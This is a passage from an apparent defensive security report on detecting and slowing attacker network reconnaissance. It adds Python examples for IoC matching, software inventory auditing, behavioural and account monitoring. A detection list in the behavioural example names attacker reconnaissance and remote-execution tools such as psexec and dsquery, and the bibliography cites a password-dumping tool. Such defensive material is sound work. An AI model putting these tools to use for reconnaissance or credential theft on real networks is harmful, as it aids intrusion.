• Log larger amounts of data in the raw log or alert format and only normalise data at the time of analysis and when required to meet known network monitoring security use cases. This ensures that a much wider range of data is available for investigation by the Incident Response Capability.

• Where possible logging of sources is done for longer than the default period; storage of data is now cheap and ideally logs should be kept for 6 months.

• Data logged should be saved to segregated networks, and should be backed up and tested to ensure all logging policies are correctly implemented.

• As a minimum, logs of the following sources should be kept:

o HTTP (usually proxy) logs
o E-mail (usually Exchange) logs
o DNS logs
o DHCP
o VPN

• For all sources logged, it is important that both successful and unsuccessful connections are logged.

• Where possible, host based logs should also be recorded, as this empowers network defenders to tie network and host activity together.


6.1.3.1 Relevant CCS Critical Security Control Sub Controls

Table 15: CCS Critical Security Sub Controls relevant to Network Monitoring

Sub Control 5.11
Network Reconnaissance Application: The ability to identify any additional tools as they are being downloaded by an attacker can provide critical advance notice of network reconnaissance activities.
Commentary: Use of encryption and custom tools can render signature-based network malware detection tools useless.

Sub Control 5.12
Network Reconnaissance Application: This is a control worth investing in but cannot be the primary method of defence.
Commentary: Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

Sub Control 13.2
Network Reconnaissance Application: By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.
Commentary: Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

Sub Control 13.4
Network Reconnaissance Application: By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.
Commentary: Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

Sub Control 13.5
Network Reconnaissance Application: By blocking obvious network reconnaissance activities, the network reconnaissance phase of the attacker’s kill chain can be extended, which provides greater opportunities to detect and respond to the attack.
Commentary: Intrusion Prevention Systems (IPS) would need to be deployed internally around key systems and repositories of environment information in order to be effective. There is always a risk in deploying automated blocking tools that an attacker may use them against you in order to achieve business disruption goals.

Sub Control 13.13
Network Reconnaissance Application: By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.
Commentary: Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

Sub Control 13.14
Network Reconnaissance Application: By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.
Commentary: Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.


6.1.4 THREAT INTELLIGENCE

Threat intelligence provides the opportunity for organisations to get ahead of the threats they face. By engaging with threat intelligence sharing forums, conducting open source intelligence gathering operations and subscribing to free and commercial technical threat intelligence feeds, it is possible to gather indicators of compromise (IoC).

IoC describe the technical characteristics of threats active on other networks and systems that can be translated to the organisation’s own monitoring systems in order to identify targeted attacks within the organisation’s own estate that would otherwise go unnoticed. Members of threat sharing forums such as the CPNI sponsored sector-focused Information Exchanges or the Cyber Information Sharing Partnership (CISP)12 often share patterns of network reconnaissance as IoC.

Threat Intelligence teams have the visibility of the external threat and the internal business priorities such that they can generate use cases for both network monitoring and behavioural analysis.

We recommend that organisations either establish a dedicated internal threat intelligence function or engage with specialist providers of threat intelligence services to provide the filtered and contextualised threat intelligence necessary to identify active threats to the business.

6.1.4.1 Relevant CCS Critical Security Control Sub Controls

There are no directly relevant CCS Critical Security Control Sub Controls for Threat Intelligence.

Threat Intelligence is a new discipline in Cyber Security but is no longer a cutting edge activity and has become business as usual in early adopter organisations. However, the discipline is not mature and there are few industry standards for the capability beyond some technical information sharing formats.

Establishing a Threat Intelligence capability goes well beyond technical analysis, though that is a key function. Many organisations are now recruiting ex-military or ex-law enforcement intelligence analysts and cross-training them into cyber security, as they bring a wealth of knowledge regarding managing the intelligence cycle, which can easily trip up a technical threat investigator without wider intelligence experience.
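
The technical half of this capability is translating shared IoC into checks against the organisation’s own monitoring data, in this case the proxy and DNS logs that section 6.1.3 lists as a minimum. The following Python is an added example of that translation and is not code from the report, from BAE Systems or from any sharing scheme; the indicator values, the log formats and the addresses are constructed for illustration and are not real threat data.

```python
# Added example (not from the PIANOS report): apply constructed indicators of
# compromise (IoC) to constructed proxy and DNS logs and list the internal hosts
# that matched, for hand-over to incident response. All values are made up.
from urllib.parse import urlparse

# Constructed IoC set, in the shape a sharing scheme might deliver (domains and IPs)
IOC = {
    "domain": {"update-check.example.net", "cdn-static.example.org"},
    "ip": {"203.0.113.45"},
}

# Constructed proxy log: "time client method url status"
PROXY_LOG = """\
2013-09-01T08:01:10 10.1.4.22 GET http://update-check.example.net/c/beacon 200
2013-09-01T08:01:12 10.1.4.23 GET http://intranet.corp.example/home 200
2013-09-01T08:02:40 10.1.4.22 POST http://203.0.113.45/upload 200
"""

# Constructed DNS log: "time client qname answer"
DNS_LOG = """\
2013-09-01T08:01:09 10.1.4.22 update-check.example.net 198.51.100.7
2013-09-01T08:05:00 10.1.9.3 cdn-static.example.org 203.0.113.45
2013-09-01T08:05:02 10.1.9.4 www.example.com 192.0.2.10
"""


def match_proxy(log, ioc=IOC):
    """Match the host part of each requested URL against domain and IP indicators."""
    hits = []
    for line in log.splitlines():
        ts, client, _method, url, _status = line.split()
        host = urlparse(url).hostname
        if host in ioc["domain"]:
            hits.append((ts, client, "domain", host))
        elif host in ioc["ip"]:
            hits.append((ts, client, "ip", host))
    return hits


def match_dns(log, ioc=IOC):
    """Match both the queried name and the resolved answer; a clean name resolving
    to an indicator address is still worth a look."""
    hits = []
    for line in log.splitlines():
        ts, client, qname, answer = line.split()
        if qname in ioc["domain"]:
            hits.append((ts, client, "domain", qname))
        if answer in ioc["ip"]:
            hits.append((ts, client, "ip", answer))
    return hits


def affected_clients(*hitlists):
    """Distinct internal hosts and the indicators each one touched."""
    out = {}
    for hits in hitlists:
        for _ts, client, kind, value in hits:
            out.setdefault(client, set()).add(f"{kind}:{value}")
    return out


if __name__ == "__main__":
    for client, seen in affected_clients(match_proxy(PROXY_LOG), match_dns(DNS_LOG)).items():
        print(client, sorted(seen))
```

The filtering and contextualisation the paragraph above asks for happens before this step: an unfiltered feed produces matches on shared infrastructure and stale indicators, and it is the threat intelligence function’s job to decide which indicators are worth alerting on in this estate.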

6.2 IDEAL COUNTERMEASURES

The measures in this section are ‘Ideal’ and in addition to those outlined in Section 6.1 should be implemented in order to ensure defences are adequate. However we recognise that these measures either have a high cost associated with them, or may be inconvenient to deploy as they may adversely affect business efficiency.

6.2.1 SOFTWARE INVENTORY

This measure is the most effective of the ‘DENY’ capabilities, preventing malware from infecting systems and preventing malware which has infected systems from being successful. Most actions conducted by attackers following infiltration have the prerequisite that they have downloaded and executed an additional tool. In most cases keeping a software inventory will mitigate the risks of this.

In order to extend this control, organisations should consider implementing policies which restrict where software is run from. Many malware families rely on running from the users’ home area.

We recognise that this control is one of the most difficult to implement, whilst maintaining effective business operations, and as such it is considered ‘ideal’ rather than critical.

It is particularly important that organisations employing software inventory controls protect their software inventory. Any technology employed as part of this control should be integrity checked regularly – ensuring that the list of authorised software has not been edited unexpectedly, and that the software which is authorised has not been tampered with. Access to the software inventory should be restricted, such that only users with a business case are able to access it.


6.2.1.1 Relevant CCS Critical Security Control Sub Controls

Table 16: CCS Critical Security Sub Controls relevant to Software Inventory

Sub Control 2.1
Network Reconnaissance Application: By denying access to unused common administration tools it is possible to severely restrict the capability of an attacker to conduct network reconnaissance.
Commentary: White lists are undoubtedly inconvenient and costly to administer but are a powerful defensive technique that significantly raises the bar for an attacker.

Sub Control 2.2
Network Reconnaissance Application: The capability to identify new and modified programs across the estate will enable detection of the download of additional tools to support network reconnaissance, allowing the organisation to respond earlier.
Commentary: Identifying and maintaining an enterprise-wide list of authorised software is a large activity with a significant cost associated with it.

Sub Control 2.4
Network Reconnaissance Application: The capability to identify modified programs across the estate will enable detection of the download of additional tools to support network reconnaissance, allowing the organisation to respond earlier.
Commentary: Software inventory is a key foundation both of vulnerability and patch management and of application white listing. It also provides a basis for software licence management and compliance.

Sub Control 2.6
Network Reconnaissance Application: The capability to identify modified programs across the estate will enable detection of the download of additional tools to support network reconnaissance, allowing the organisation to respond earlier.
Commentary: Software inventory is a key foundation both of vulnerability and patch management and of application white listing. It also provides a basis for software licence management and compliance.

Sub Control 2.7
Network Reconnaissance Application: The increasing use of mobile devices and the increasing power of mobile devices now require that they be treated at least as well as workstations with regard to cyber security.
Commentary: The growth in sophisticated mobile malware targeting financial fraud increases the risk that mobile devices used by your staff and your partners have been recruited into a mobile botnet and that access is available on the black market.
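
Section 6.2.1 asks for two checks that are easy to conflate: that installed software still matches the authorised list (sub-controls 2.2 and 2.4), and that the list itself has not been edited unexpectedly. The Python below is an added example of both, not code from the report or from any inventory product: the authorised list carries a SHA-256 per program and is sealed with an HMAC whose key is held away from the endpoints, so a silent edit to the list is detectable, and an audit classifies each installed program as authorised, modified or unauthorised. The paths, file contents and key are constructed; reading real binaries from disk is left as the obvious substitution.

```python
# Added example (not from the PIANOS report): check installed programs against a
# sealed authorised-software list, and check the list itself for tampering.
# Paths, contents and the sealing key are constructed; the record format is assumed.
import hashlib
import hmac
import json


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_inventory(installed, secret: bytes):
    """Record authorised programs with their hashes and seal the record with an HMAC,
    so that an unexpected edit to the list can be detected (the key is held off-host)."""
    entries = {path: sha256_bytes(content) for path, content in installed.items()}
    body = json.dumps(entries, sort_keys=True).encode()
    return {"entries": entries, "seal": hmac.new(secret, body, hashlib.sha256).hexdigest()}


def inventory_is_intact(inventory, secret: bytes) -> bool:
    """Recompute the seal over the entries and compare in constant time."""
    body = json.dumps(inventory["entries"], sort_keys=True).encode()
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, inventory["seal"])


def audit(installed, inventory):
    """Classify every installed program as authorised, modified (hash differs from the
    baseline) or unauthorised (absent from the list altogether)."""
    report = {"authorised": [], "modified": [], "unauthorised": []}
    for path, content in installed.items():
        baseline = inventory["entries"].get(path)
        if baseline is None:
            report["unauthorised"].append(path)
        elif baseline != sha256_bytes(content):
            report["modified"].append(path)
        else:
            report["authorised"].append(path)
    return report


SEAL_KEY = b"constructed-demo-key"  # in practice kept away from the endpoints being checked

# Baseline taken when only the two approved tools were present (constructed contents)
BASELINE = build_inventory({
    "C:/Program Files/Office/word.exe": b"office-word-build-1",
    "C:/Program Files/Tools/putty.exe": b"putty-build-6",
}, SEAL_KEY)

# What is "installed" now: one tool changed, one new program running from the user area
INSTALLED = {
    "C:/Program Files/Office/word.exe": b"office-word-build-1",
    "C:/Program Files/Tools/putty.exe": b"putty-build-7",
    "C:/Users/jsmith/AppData/Local/Temp/scan.exe": b"unknown",
}

if __name__ == "__main__":
    print("inventory intact:", inventory_is_intact(BASELINE, SEAL_KEY))
    print(audit(INSTALLED, BASELINE))
```

The unauthorised entry under the user’s profile is exactly the case the paragraph on restricting where software may run from is aimed at; a location policy would have stopped it executing, and the inventory audit reports that it arrived.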


6.2.2 NETWORK DIODE

In order to reduce the risk of high value data being lost, organisations should use network diode technology to segregate valuable data from operational networks. If set up properly, network diodes can make lateral movement difficult, as well as preventing access to certain data.

Implementation of network diodes should be considered as part of a wider thought process about where the data on enterprise networks exists, whether there is a business requirement for it residing in that location and which users require access to the data.

6.2.2.1 Relevant CCS Critical Security Control Sub Controls

There are no directly relevant CCS Critical Security Control Sub Controls for Network Diodes.

Network diodes are very strong and very reliable network flow control devices. Properly deployed an attacker will not be able to traverse the network diode and collect environment information from the ‘high’ side of the device. Network diodes need little maintenance once deployed and depending on the complexity of the deployment may not need extensive configuration.

However, Network Diodes are inflexible and hugely inconvenient for IT staff used to bi-directional network communications, often leading to complicated and self-defeating bypass mechanisms. Network diodes require a strong defined security architecture that is aware of the operational communications needs of the business environment.

6.2.3 BEHAVIOURAL ANALYSIS

Behavioural analysis is essentially an extension of the log analysis recommendation made in 6.1.1, and ideally organisations should implement behavioural analysis in addition to regular log analysis. By collecting large volumes of data on typical user and system behaviour in organisations and keeping statistics on average transactions made by users, organisations can apply behavioural analytics and big data techniques to detect subtle cyber threats.

The key enabling characteristics of behavioural analytics are that it highlights behaviours that look similar to expected threats and that it provides probable matches against the underlying characteristics of threat behaviours, such that an attacker attempting to evade detection is forced to make fundamental changes to their modus operandi. Critically, behavioural analytics detects general classes of threat and can investigate behaviours that extend over wide ranges of time, such as a careful targeted attack.

In particular Behavioural Analysis can be used to detect suspicious behaviours such as the concentration of sys-admin style tools on a regular user account, the download of additional tools and the use of communication channels with previously unknown command and control (C2) servers.

However, in order to successfully analyse the behaviours on the business’s networks and systems a much broader range of logs and alerts must be kept and processed.

We recognise that for small organisations (typically less than 500 seats), the costs associated with building/maintaining behavioural analysis solutions can be too high. This cost can sometimes be overcome through outsourcing of this capability. In the near future we expect the cost of behavioural analysis solutions to decrease, and the maturity of these solutions to increase, moving this control from ‘Ideal’ to ‘Critical’.
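
The first of the suspicious behaviours named above, a concentration of sys-admin style tools on a regular user account, is a good illustration of the threat-driven profiling this section recommends, because it compares an account with its own history rather than hunting for unexplained anomalies. The Python below is an added example of that check and is not code from the report, from BAE Systems or from any analytics product: it builds a per-account daily count of administration-tool executions from constructed process events, derives a baseline over five days, and scores the sixth day against it. The tool list, account names and events are constructed, and the z-score threshold is an assumption to be tuned per estate.

```python
# Added example (not from the PIANOS report): threat-driven behavioural check for the
# "sys-admin tools on a regular user account" pattern. Events and tool list are constructed.
from collections import defaultdict
from statistics import mean, pstdev

# Tools an ordinary user rarely runs but which an attacker uses to map the environment
ADMIN_TOOLS = {"net.exe", "nltest.exe", "dsquery.exe", "wmic.exe", "netstat.exe", "psexec.exe"}

# Constructed process-start events: (day, account, account_type, image)
EVENTS = []
for day in range(1, 6):  # five days of ordinary activity used as the baseline
    EVENTS += [(day, "jsmith", "user", "winword.exe"), (day, "jsmith", "user", "outlook.exe"),
               (day, "adm_kp", "admin", "net.exe"), (day, "adm_kp", "admin", "wmic.exe"),
               (day, "adm_kp", "admin", "dsquery.exe")]
EVENTS.append((2, "jsmith", "user", "netstat.exe"))  # one stray admin tool is normal
# Day 6: the regular user's account suddenly runs a cluster of admin tools
EVENTS += [(6, "jsmith", "user", img) for img in ("net.exe", "nltest.exe", "dsquery.exe", "wmic.exe", "net.exe")]
EVENTS += [(6, "adm_kp", "admin", img) for img in ("net.exe", "wmic.exe", "dsquery.exe")]


def admin_tool_counts(events):
    """account -> {day: number of admin-tool executions}"""
    counts = defaultdict(lambda: defaultdict(int))
    for day, acct, _, image in events:
        if image in ADMIN_TOOLS:
            counts[acct][day] += 1
    return counts


def score_day(events, target_day, baseline_days):
    """Compare each account's admin-tool count on target_day with its own baseline (z-score)."""
    roles = {acct: role for _, acct, role, _ in events}
    result = {}
    for acct, per_day in admin_tool_counts(events).items():
        history = [per_day.get(d, 0) for d in baseline_days]
        mu, sigma = mean(history), pstdev(history)
        today = per_day.get(target_day, 0)
        if sigma > 0:
            z = (today - mu) / sigma
        else:  # perfectly regular history: any increase is out of profile, otherwise in profile
            z = float("inf") if today > mu else 0.0
        result[acct] = {"type": roles[acct], "today": today, "baseline_mean": mu, "z": z}
    return result


def flag_accounts(events, target_day, baseline_days, z_threshold=3.0):
    """Accounts whose admin-tool use on target_day is far above their own norm."""
    scores = score_day(events, target_day, baseline_days)
    return sorted(acct for acct, s in scores.items() if s["z"] >= z_threshold)


if __name__ == "__main__":
    for acct, s in score_day(EVENTS, 6, range(1, 6)).items():
        print(acct, s)
    print("flagged:", flag_accounts(EVENTS, 6, range(1, 6)))
```

The administrator account runs the same tools every day and is not flagged, which is the point of profiling per account: the same activity is in profile for one identity and out of profile for another. The account type carried in the result lets the analyst weight a hit on a regular user more heavily than one on an administrator.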


6.2.3.1 Relevant CCS Critical Security Control Sub Controls

Table 17: CCS Critical Security Sub Controls relevant to Behavioural Analysis

Sub Control 5.1
Network Reconnaissance Application: Identifying unusual behaviour on endpoint devices, such as network reconnaissance style activity, requires data from continuous monitoring.
Commentary: Behavioural analytics requires significant amounts of data, such as system process activity.

Sub Control 5.10
Network Reconnaissance Application: Network reconnaissance is rarely obviously malicious activity unless it is analysed in the business context, including who initiated the activity, which systems were targeted and what other similar events have been occurring.
Commentary: Anomaly detection is a useful technique, but in our experience threat-driven behavioural analytics based on an analysis of threat behaviours, rather than the identification of unexplained anomalous behaviour, is more reliable and produces fewer false positives.

Sub Control 5.14
Network Reconnaissance Application: Identifying network reconnaissance from network traffic activity requires data from continuous monitoring.
Commentary: Behavioural analytics requires significant amounts of data, such as network activity.

Sub Control 14.7
Network Reconnaissance Application: Regular analysis of logs for behavioural analysis is necessary, as some behavioural indicators for network reconnaissance will only become apparent over time.
Commentary: Biweekly analysis is no longer appropriate given the increased level of the threat. A 24 hour batch processing cycle should be considered the minimum window for log processing.

Sub Control 16.12
Network Reconnaissance Application: Understanding what a normal user’s behavioural profile is allows the divergent profile of a compromised identity conducting network reconnaissance to stand out from its peers.
Commentary: The user profile should include patterns of network behaviour such as web browsing, intranet application usage and technical tool usage.


6.2.4 ACCOUNT MONITORING

As part of the Monitoring family of controls, Account Monitoring offers an increased level of control over user accounts. Organisations should employ this control to detect malicious insiders and attackers attempting to impersonate legitimate users. This measure mitigates risks which could develop as a result of other weak areas, such as dormant or inactive accounts which an attacker could exploit, and detects where an attacker has been able to escalate privileges. It also provides an extra layer of security above an organisation’s vetting, providing increased checks and balances on users trusted with privileged accounts.

Account Monitoring can be linked to other processes, such as Human Resources, for the disabling of employee or contractor accounts immediately upon termination. This control also provides the facility of strict account expiration, password policies, forced log offs and lockouts. Furthermore, the control offers the automation of reporting to increase the efficiency of account review and analysis, to ensure accounts not associated with a business process or owner are disabled.

6.2.4.1 Relevant CCS Critical Security Control Sub Controls

Table 18: CCS Critical Security Sub Controls relevant to Account Monitoring

Sub Control 16.3
Network Reconnaissance Application: Attempts to move laterally using credentials discovered at the point of infiltration can cause account lock outs and generate log-in failure logs and alerts.
Commentary: A targeted attacker will not get caught like this very often or for very long. However, the presence of this sort of rate limiter for lateral movement will extend the network reconnaissance phase.

Sub Control 16.5
Network Reconnaissance Application: By reducing the number of logged-in but inactive accounts there will be fewer obvious targets visible to attackers attempting to move laterally.
Commentary: This also ensures that analysis of active accounts during an investigation can focus on truly active accounts and won’t include inactive but logged-on accounts, reducing the investigative burden.

Sub Control 16.6
Network Reconnaissance Application: By reducing the number of long-lived dormant accounts there are fewer targets for attackers to attempt to compromise.
Commentary: Creating invitingly-named and irresistibly authorised ‘canary’ dormant accounts that are heavily monitored can provide an early warning of attempted lateral access and network reconnaissance.
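
Three of the Table 18 points translate directly into periodic account reviews: long-lived dormant accounts (16.6), sessions that are logged in but idle (16.5), and any use at all of a monitored ‘canary’ account (16.6 commentary). The Python below is an added example of those reviews and is not code from the report or from BAE Systems; the directory export, session table and logon records are constructed, the idle thresholds are assumptions, and the canary account name is a placeholder.

```python
# Added example (not from the PIANOS report): dormant-account, stale-session and
# canary-account reviews over constructed directory and audit data.
from datetime import datetime, timedelta

NOW = datetime(2013, 9, 1, 12, 0, 0)  # constructed "current time" for a reproducible run

# Constructed directory export: account -> (last_logon, enabled, is_canary)
ACCOUNTS = {
    "jsmith": (datetime(2013, 8, 31, 17, 5), True, False),
    "old_contract": (datetime(2013, 3, 2, 9, 0), True, False),  # dormant but still enabled
    "svc_backup": (datetime(2013, 8, 30, 2, 0), True, False),
    "it_superuser": (None, True, True),  # canary: never legitimately used, heavily monitored
}

# Constructed session table: (account, host, logon_time, last_activity)
SESSIONS = [
    ("jsmith", "WS-017", datetime(2013, 9, 1, 8, 30), datetime(2013, 9, 1, 11, 55)),
    ("svc_backup", "SRV-BK1", datetime(2013, 8, 30, 2, 0), datetime(2013, 8, 30, 2, 40)),
]

# Constructed logon audit records: (time, account, source_host, success)
LOGON_EVENTS = [
    (datetime(2013, 9, 1, 11, 40), "it_superuser", "WS-017", False),
    (datetime(2013, 9, 1, 11, 41), "it_superuser", "WS-017", True),
    (datetime(2013, 9, 1, 8, 30), "jsmith", "WS-017", True),
]


def dormant_accounts(accounts, now=NOW, max_idle=timedelta(days=90)):
    """16.6: enabled, non-canary accounts with no logon inside max_idle (or never)."""
    return sorted(a for a, (last, enabled, canary) in accounts.items()
                  if enabled and not canary and (last is None or now - last > max_idle))


def stale_sessions(sessions, now=NOW, max_idle=timedelta(hours=12)):
    """16.5: sessions still logged on but idle for longer than max_idle."""
    return sorted((a, h) for a, h, _, last in sessions if now - last > max_idle)


def canary_alerts(accounts, logons):
    """16.6 commentary: any logon attempt, successful or not, against a canary account."""
    canaries = {a for a, (_, _, c) in accounts.items() if c}
    return [(t.isoformat(), a, src, ok) for t, a, src, ok in logons if a in canaries]


if __name__ == "__main__":
    print("dormant:", dormant_accounts(ACCOUNTS))
    print("stale sessions:", stale_sessions(SESSIONS))
    print("canary alerts:", canary_alerts(ACCOUNTS, LOGON_EVENTS))
```

A failed attempt against the canary is as significant as a success, since a legitimate user has no reason to try the account; the failed-then-successful pair from one workstation is the early warning the commentary describes, and the source host is the first thing incident response will want.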


CCS Critical Security Sub Controls relevant to Privileged User Access ManagementTable 19

6.2.5 PRIVILEGED USER MANAGEMENTOne of the reconnaissance objectives outlined in section 3, was elevate privileges to collect environment information; in order to make this objective as difficult as possible, it is critical to implement good user management policies and systems. Specifically we believe that the risk of privilege escalation being successful for attackers can be significantly reduced through a combination of:

• Ensuring all high-value administrative accounts are used by exception only, administrators should use non-privileged accounts by default.

• Using a ‘break-glass’ procedure to allow administrators to request and take access to high-value administrative accounts in emergencies but ensure that fact is recorded, that the record is correlated with a valid business emergency and that the access to the account is reset following use.

• Increasing the basic security policies for privileged users, such as required password complexity, for further details on password management see the NIST guide.13

• Only giving administrator privileges to users who require it.

• Review of the groups to which users belong and ensuring not everyone is in the same group.

• Ensuring that the local administrator account is not the same for all accounts across the estate.

6.2.5.1 Relevant CCS Critical Security Control Sub Controls

Sub Control Number

Network Reconnaissance Application Commentary

3.3 Limiting the number of administrative users can, when combined with other controls such as application whitelisting, force an attacker to undertake lateral movement or escalation of privileges to run network reconnaissance programs, thus putting them at greater risk of detection by network defenders.

Control of administrative privileges can, anecdotally, increase reliability and reduce support costs due to less variability in system configuration across the estate.

12.1 Restricting the use of administrative accounts to authorised administrative activities only, and auditing those activities when they occur, makes it more likely that the use of valid administrative privileges and tools for network reconnaissance can be identified as falling outside any authorised activity.

This requires rigour such as formal change control windows and post event reconciliation of audit records between change requests and system logs.

12.2 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

An up-to date inventory of valid administrative accounts can be used as a source of enrichment for log analysis and behavioural analytics.

12.6 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

Service accounts will often exhibit ‘machine-like’ behaviours and a change in behaviour to resemble human activity can be an indicator of an account hijacked for network reconnaissance.


12.7 Recovery of password lists, either from notes kept on administrative workstations or directly from password databases and user directories, is a key network reconnaissance activity: these lists are key environmental information that an attacker needs to complete lateral access activities.

Keeping a recoverable list of administrative accounts and passwords for emergency break-glass access by authorised administrators is a good practice that supports availability. However, such a list is so useful to an attacker that every one of them should be known to the organisation and protected with strong security controls.

12.8 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

Control of administrative privileges can, anecdotally, increase reliability and reduce support costs due to less variability in system configuration across the estate.

12.9 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

Control of administrative privileges can, anecdotally, increase reliability and reduce support costs due to less variability in system configuration across the estate.
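The controls listed in section 6.2.5 and the commentary on sub-controls 12.1, 12.2 and 12.6 above describe three reconciliations an analyst would run over logon audit records: privileged logons against authorised change windows, break-glass use against recorded emergencies, and service accounts against their expected machine-like behaviour. The Python script below is an added example of that reconciliation and is not code from the PIANOS report or from BAE Systems; every account name, host, change window, break-glass record and logon event in it is constructed, and the `ts|account|host|logon_type` line format stands in for whatever the SIEM actually exports.

```python
"""Reconcile privileged-account logons against authorised change windows, an
inventory of administrative and service accounts, and break-glass records.

Added example for the privileged user management section; not code from the
PIANOS report or BAE Systems. All accounts, hosts, windows, records and events
are constructed, and the 'ts|account|host|logon_type' format is an assumption.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Windows logon types implying a person at a console (2) or an RDP session (10).
INTERACTIVE_LOGON_TYPES = {2, 10}


@dataclass(frozen=True)
class LogonEvent:
    when: datetime
    account: str
    host: str
    logon_type: int


@dataclass(frozen=True)
class ChangeWindow:
    account: str        # administrative account authorised for this change
    start: datetime
    end: datetime
    ticket: str


@dataclass(frozen=True)
class BreakGlassRecord:
    account: str
    when: datetime
    incident: str


# Constructed inputs standing in for the directory, change system and SIEM.
ADMIN_ACCOUNTS = {r"CORP\adm-jsmith", r"CORP\adm-akhan"}
SERVICE_ACCOUNTS = {r"CORP\svc-backup"}
BREAK_GLASS_ACCOUNTS = {r"CORP\bg-domain"}
CHANGE_WINDOWS = [
    ChangeWindow(r"CORP\adm-jsmith", datetime(2014, 3, 10, 22, 0),
                 datetime(2014, 3, 11, 2, 0), "CHG-1042"),
]
BREAK_GLASS_RECORDS = [
    BreakGlassRecord(r"CORP\bg-domain", datetime(2014, 3, 11, 9, 5), "INC-7781"),
]
SAMPLE_EVENTS = [  # ts|account|host|logon_type
    r"2014-03-10T23:15:00|CORP\adm-jsmith|SRV-FILE01|10",  # RDP inside the CHG-1042 window
    r"2014-03-11T14:40:00|CORP\adm-akhan|SRV-DC01|2",      # admin logon with no change window
    r"2014-03-11T09:12:00|CORP\bg-domain|SRV-DC01|2",      # break-glass use, INC-7781 recorded
    r"2014-03-12T03:30:00|CORP\bg-domain|WS-0417|10",      # break-glass use, nothing recorded
    r"2014-03-11T02:00:00|CORP\svc-backup|SRV-FILE01|4",   # batch logon, normal for a service account
    r"2014-03-11T11:07:00|CORP\svc-backup|WS-0417|10",     # service account driven over RDP
    r"2014-03-11T08:00:00|CORP\jsmith|WS-0203|2",          # ordinary user, out of scope
]


def parse_event(line: str) -> LogonEvent:
    ts, account, host, logon_type = line.strip().split("|")
    return LogonEvent(datetime.fromisoformat(ts), account, host, int(logon_type))


def in_change_window(ev: LogonEvent, windows) -> bool:
    """True if some change window names this account and covers the logon time."""
    return any(w.account == ev.account and w.start <= ev.when <= w.end for w in windows)


def break_glass_recorded(ev: LogonEvent, records, tolerance=timedelta(minutes=30)) -> bool:
    """True if a break-glass record for this account exists within the tolerance."""
    return any(r.account == ev.account and abs(ev.when - r.when) <= tolerance for r in records)


def review(events, admin_accounts, service_accounts, break_glass_accounts, windows, records):
    """Return (reason, account, host, timestamp) for each logon needing analyst attention."""
    findings = []
    for ev in events:
        stamp = ev.when.isoformat()
        if ev.account in break_glass_accounts:
            if not break_glass_recorded(ev, records):
                findings.append(("break-glass-unrecorded", ev.account, ev.host, stamp))
        elif ev.account in admin_accounts and not in_change_window(ev, windows):
            findings.append(("admin-outside-change-window", ev.account, ev.host, stamp))
        if ev.account in service_accounts and ev.logon_type in INTERACTIVE_LOGON_TYPES:
            findings.append(("service-account-interactive", ev.account, ev.host, stamp))
    return findings


def run_review():
    """Parse the constructed events and reconcile them against the constructed inventories."""
    events = [parse_event(line) for line in SAMPLE_EVENTS]
    return review(events, ADMIN_ACCOUNTS, SERVICE_ACCOUNTS, BREAK_GLASS_ACCOUNTS,
                  CHANGE_WINDOWS, BREAK_GLASS_RECORDS)


if __name__ == "__main__":
    for finding in run_review():
        print(" ".join(finding))
```

Run stand-alone the script prints three findings: the administrative logon with no matching change window, the break-glass logon with no incident record, and the service account appearing over RDP. In a real deployment the account inventories come from the directory (the enrichment source sub-control 12.2 refers to), the change windows from the change-management system and the events from the security log; the 30-minute tolerance for matching a break-glass logon to its record is a tunable assumption, not a figure from the report.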


7 CONCLUSION

While it may not be possible to prevent targeted attacks, much can be done to improve defences and responses to the threat.

Network reconnaissance is a critical time for the attacker; it is when they are most vulnerable, with only a limited foothold in the environment, and also when they are most visible, as they scan for their targets across the environment before building a covert position. By slowing the network reconnaissance activity we increase our opportunity to detect its effects and respond before significant damage occurs.

Fully implementing the four critical controls identified in section 6.1 of this report will significantly increase your ability to detect network reconnaissance, and implementing selected ideal controls identified in section 6.2 will slow down the attacker’s network reconnaissance activities while you watch for them.

7.1 KEY TAKEAWAY

Do not under-estimate the value to your attacker of the technical information describing your environment and the business information describing your organisation (as described in Section 2.2). Protect this information at least as well as you protect your core business assets.


8 BIBLIOGRAPHY

[1] http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html?pagewanted=all&_r=0 [Online].

[2] Mandiant, “APT1: Exposing One of China’s Cyber Espionage Units”, http://www.mandiant.com/ [Online].

[3] E. M. Hutchins, M. J. Cloppert and R. M. Amin, “Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains”, Lockheed Martin Corporation.

[4] http://news.sky.com/story/1082264/chinese-hacking-suspects-back-in-business [Online].

[5] http://rf.harris.com/media/SierraII_tcm26-9224.pdf [Online].

[6] http://www.enteo.com/ [Online].

[7] http://foofus.net/goons/fizzgig/pwdump/ [Online].

[8] http://blogs.rsa.com/lions-at-the-watering-hole-the-voho-affair/ [Online].

[9] http://www.teamviewer.com/en/index.aspx [Online].

[10] http://www.counciloncybersecurity.org/practice-areas/technology [Online].

[11] http://www.dtic.mil/doctrine/new_pubs/jp3_13.pdf [Online].

[12] https://www.cisp.org.uk [Online].

[13] http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf [Online].


ABOUT US

